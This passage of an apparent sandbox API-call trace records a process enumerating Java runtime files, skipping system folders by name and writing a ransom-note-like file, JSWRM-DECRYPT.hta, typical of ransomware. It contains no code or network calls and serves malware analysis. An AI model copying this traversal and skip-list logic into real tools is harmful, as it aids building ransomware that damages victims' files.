lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="net.dll", lpUsedDefaultChar=0x0) returned 7 [0069.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="net.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="net.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="net.dll", lpUsedDefaultChar=0x0) returned 7 [0069.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0069.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.721] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xec40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="nio.dll", cAlternateFileName="")) returned 1 [0069.721] lstrcmpiW (lpString1="nio.dll", lpString2=".") returned 1 [0069.721] lstrcmpiW (lpString1="nio.dll", lpString2="..") returned 1 [0069.721] lstrcmpiW (lpString1="nio.dll", lpString2="...") returned 1 [0069.721] lstrcmpiW (lpString1="nio.dll", lpString2="windows") returned -1 [0069.721] lstrcmpiW (lpString1="nio.dll", lpString2="recovery") returned -1 [0069.721] lstrcmpiW (lpString1="nio.dll", lpString2="perflogs") returned -1 [0069.721] lstrcmpiW (lpString1="nio.dll", lpString2="documents and settings") returned 1 [0069.721] lstrcmpiW (lpString1="nio.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.721] lstrcmpiW (lpString1="nio.dll", lpString2="system volume information") returned -1 [0069.721] lstrcmpiW (lpString1="nio.dll", lpString2="msocache") returned 1 [0069.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nio.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nio.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nio.dll", lpUsedDefaultChar=0x0) returned 7 [0069.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nio.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nio.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nio.dll", lpUsedDefaultChar=0x0) returned 7 [0069.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0069.721] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4a40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="npt.dll", cAlternateFileName="")) returned 1 [0069.721] lstrcmpiW (lpString1="npt.dll", lpString2=".") returned 1 [0069.721] lstrcmpiW (lpString1="npt.dll", lpString2="..") returned 1 [0069.721] lstrcmpiW (lpString1="npt.dll", lpString2="...") returned 1 [0069.722] lstrcmpiW (lpString1="npt.dll", lpString2="windows") returned -1 [0069.722] lstrcmpiW (lpString1="npt.dll", lpString2="recovery") returned -1 [0069.722] lstrcmpiW (lpString1="npt.dll", lpString2="perflogs") returned -1 [0069.722] lstrcmpiW (lpString1="npt.dll", lpString2="documents and settings") returned 1 [0069.722] lstrcmpiW (lpString1="npt.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.722] lstrcmpiW (lpString1="npt.dll", lpString2="system volume information") returned -1 [0069.722] lstrcmpiW (lpString1="npt.dll", lpString2="msocache") returned 1 [0069.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npt.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npt.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="npt.dll", lpUsedDefaultChar=0x0) returned 7 [0069.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npt.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="npt.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="npt.dll", lpUsedDefaultChar=0x0) returned 7 [0069.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0069.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.722] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="orbd.exe", cAlternateFileName="")) returned 1 [0069.722] lstrcmpiW (lpString1="orbd.exe", lpString2=".") returned 1 [0069.722] lstrcmpiW (lpString1="orbd.exe", lpString2="..") returned 1 [0069.722] lstrcmpiW (lpString1="orbd.exe", lpString2="...") returned 1 [0069.722] lstrcmpiW (lpString1="orbd.exe", lpString2="windows") returned -1 [0069.722] lstrcmpiW (lpString1="orbd.exe", lpString2="recovery") returned -1 [0069.722] lstrcmpiW (lpString1="orbd.exe", lpString2="perflogs") returned -1 [0069.722] lstrcmpiW (lpString1="orbd.exe", lpString2="documents and settings") returned 1 [0069.722] lstrcmpiW (lpString1="orbd.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.722] lstrcmpiW (lpString1="orbd.exe", lpString2="system volume information") returned -1 [0069.722] lstrcmpiW (lpString1="orbd.exe", lpString2="msocache") returned 1 [0069.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="orbd.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="orbd.exe", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="orbd.exe", lpUsedDefaultChar=0x0) returned 8 [0069.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0069.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="orbd.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="orbd.exe", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="orbd.exe", lpUsedDefaultChar=0x0) returned 8 [0069.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0069.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0069.723] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="pack200.exe", cAlternateFileName="")) returned 1 [0069.723] lstrcmpiW (lpString1="pack200.exe", lpString2=".") returned 1 [0069.723] lstrcmpiW (lpString1="pack200.exe", lpString2="..") returned 1 [0069.723] lstrcmpiW (lpString1="pack200.exe", lpString2="...") returned 1 [0069.723] lstrcmpiW (lpString1="pack200.exe", lpString2="windows") returned -1 [0069.723] lstrcmpiW (lpString1="pack200.exe", lpString2="recovery") returned -1 [0069.723] lstrcmpiW (lpString1="pack200.exe", lpString2="perflogs") returned -1 [0069.723] lstrcmpiW (lpString1="pack200.exe", lpString2="documents and settings") returned 1 [0069.723] lstrcmpiW (lpString1="pack200.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.723] lstrcmpiW (lpString1="pack200.exe", lpString2="system volume information") returned -1 [0069.723] lstrcmpiW (lpString1="pack200.exe", lpString2="msocache") returned 1 [0069.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pack200.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pack200.exe", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pack200.exe", lpUsedDefaultChar=0x0) returned 11 [0069.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pack200.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pack200.exe", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pack200.exe", lpUsedDefaultChar=0x0) returned 11 [0069.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0069.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.723] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2a2bf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="plugin2", cAlternateFileName="")) returned 1 [0069.723] lstrcmpiW (lpString1="plugin2", lpString2=".") returned 1 [0069.723] lstrcmpiW (lpString1="plugin2", lpString2="..") returned 1 [0069.723] lstrcmpiW (lpString1="plugin2", lpString2="...") returned 1 [0069.723] lstrcmpiW (lpString1="plugin2", lpString2="windows") returned -1 [0069.723] lstrcmpiW (lpString1="plugin2", lpString2="recovery") returned -1 [0069.723] lstrcmpiW (lpString1="plugin2", lpString2="perflogs") returned 1 [0069.723] lstrcmpiW (lpString1="plugin2", lpString2="documents and settings") returned 1 [0069.723] lstrcmpiW (lpString1="plugin2", lpString2="$RECYCLE.BIN") returned 1 [0069.723] lstrcmpiW (lpString1="plugin2", lpString2="system volume information") returned -1 [0069.724] lstrcmpiW (lpString1="plugin2", lpString2="msocache") returned 1 [0069.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0069.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0069.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0069.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0069.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.724] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\jswrm-decrypt.hta")) returned 0xffffffff [0069.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0069.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0069.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0069.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0069.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0069.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0069.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.725] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.725] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.725] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0069.726] CloseHandle (hObject=0x454) returned 1 [0069.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0069.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0069.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0069.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0069.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0069.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0069.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\jswrm-decrypt.hta")) returned 0x20 [0069.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0069.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0069.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.728] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2a2bf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2038be90, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0069.728] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.728] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2a2bf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2038be90, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0069.729] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.729] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.729] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2038be90, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x2038be90, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x2038be90, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0069.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f98, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0069.730] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xca750, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="msvcr100.dll", cAlternateFileName="")) returned 1 [0069.730] lstrcmpiW (lpString1="msvcr100.dll", lpString2=".") returned 1 [0069.730] lstrcmpiW (lpString1="msvcr100.dll", lpString2="..") returned 1 [0069.730] lstrcmpiW (lpString1="msvcr100.dll", lpString2="...") returned 1 [0069.730] lstrcmpiW (lpString1="msvcr100.dll", lpString2="windows") returned -1 [0069.730] lstrcmpiW (lpString1="msvcr100.dll", lpString2="recovery") returned -1 [0069.730] lstrcmpiW (lpString1="msvcr100.dll", lpString2="perflogs") returned -1 [0069.730] lstrcmpiW (lpString1="msvcr100.dll", lpString2="documents and settings") returned 1 [0069.730] lstrcmpiW (lpString1="msvcr100.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.730] lstrcmpiW (lpString1="msvcr100.dll", lpString2="system volume information") returned -1 [0069.730] lstrcmpiW (lpString1="msvcr100.dll", lpString2="msocache") returned 1 [0069.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr100.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr100.dll", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr100.dll", lpUsedDefaultChar=0x0) returned 12 [0069.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr100.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr100.dll", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr100.dll", lpUsedDefaultChar=0x0) returned 12 [0069.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0069.730] HeapFree (in: 